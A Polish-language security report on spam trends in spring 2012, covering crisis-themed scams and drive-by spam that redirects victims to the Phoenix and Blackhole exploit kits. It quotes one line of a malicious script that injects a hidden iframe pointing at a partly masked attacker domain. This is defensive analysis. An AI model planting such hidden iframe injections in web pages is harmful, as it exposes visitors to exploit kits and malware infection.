Ewolucja spamu IV-VI 2012

Przeczytaj także: Spam w XI 2011 r.

W II kwartale 2012 r. oszuści zaczęli wykorzystywać kryzys zarówno w celu zwrócenia uwagi na tradycyjne wysyłki dystrybuowane za pośrednictwem programów partnerskich, jak i reklamowania podejrzanie tanich pożyczek. Ponadto, angielsko i rosyjskojęzyczne wiadomości e-mail zapraszały do udziału w seminariach na temat globalnego kryzysu gospodarczego, w szczególności w strefie Euro.

Szkodliwy spam

Jeżeli trudna sytuacja gospodarcza doprowadzi do powtórki scenariusza z lat 2008-2009, w nadchodzących miesiącach powinniśmy spodziewać się wzrostu poziomu oszukańczego i szkodliwego spamu. W świetle tej prognozy warto omówić kilka sztuczek spamerskich wykorzystywanych do dystrybucji szkodliwego kodu. Metody te obejmują zarówno nowe techniki jak i kilka starych, ulubionych trików spamerów.

Spam Drive-by

Powszechnie wiadomo, że szkodliwy spam występuje nie tylko w postaci załączników, ale również niebezpiecznych odsyłaczy. Warto wiedzieć, że kliknięcie jednego z takich odsyłaczy może doprowadzić do zainfekowania komputera – z czego jego właściciel może w ogóle nie zdawać sobie sprawy. Wynika to z tego, że odsyłacze te przekierowują do różnych stron zawierających pakiety exploitów, czyli zestawy procedur, których celem jest znalezienie luk w popularnych aplikacjach i systemach operacyjnych.

W II kwartale 2012 r. odsetek wysyłek wykorzystywanych do przeprowadzania ataków drive-by był szczególnie wysoki. Poniżej przedstawiamy konkretne przykłady ilustrujące ogólne działanie takich ataków.

Użytkownik otrzymuje fałszywe powiadomienie z popularnego zasobu, e-mail wyglądający na oficjalną wiadomość, mailing informacyjny, a nawet wiadomość od znajomej osoby. Wszystkie te wiadomości łączy to, że zachęcają użytkownika do kliknięcia odsyłacza. Bardzo często zawierają tekst namawiający użytkownika do kliknięcia odsyłacza „jak najszybciej” lub „niezwłocznie”.

Po kliknięciu odsyłacza użytkownik ląduje na stronie ze zintegrowanym zaciemnionym skryptem (w wiadomości powyżej skrypt ten został wykryty przez Kaspersky Anti-Virus jako Trojan.Script.Generic). Zadaniem skryptu jest przekierowywanie użytkownika na szkodliwą stronę przy pomocy znacznika iframe.

Oto część początkowego kodu:

document.write (s) iframesrc='http://r*****d.su:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;' /iframe

Na stronie wyświetla się komunikat “Loading...Please Wait...”

W tym konkretnym przypadku użytkownik jest przekierowywany na stronę z pakietem exploitów Phoenix. Innym razem odsyłacze mogą prowadzić do pakietu exploitów Blackhole. Po przekierowaniu komputer użytkownika jest atakowany przez exploity wykorzystujące luki w takim oprogramowaniu jak Java, Flash Player lub Adobe Reader. Jeżeli oszuści będą mieli szczęście (tj. przynajmniej jedna z wymienionych wyżej aplikacji zainstalowanych na komputerze użytkownika będzie podatna na ataki), na komputer ofiary zostanie pobrany plik wykonywalny. Plik ten kontaktuje się z centrum kontroli i pobiera inne szkodliwe programy na komputer.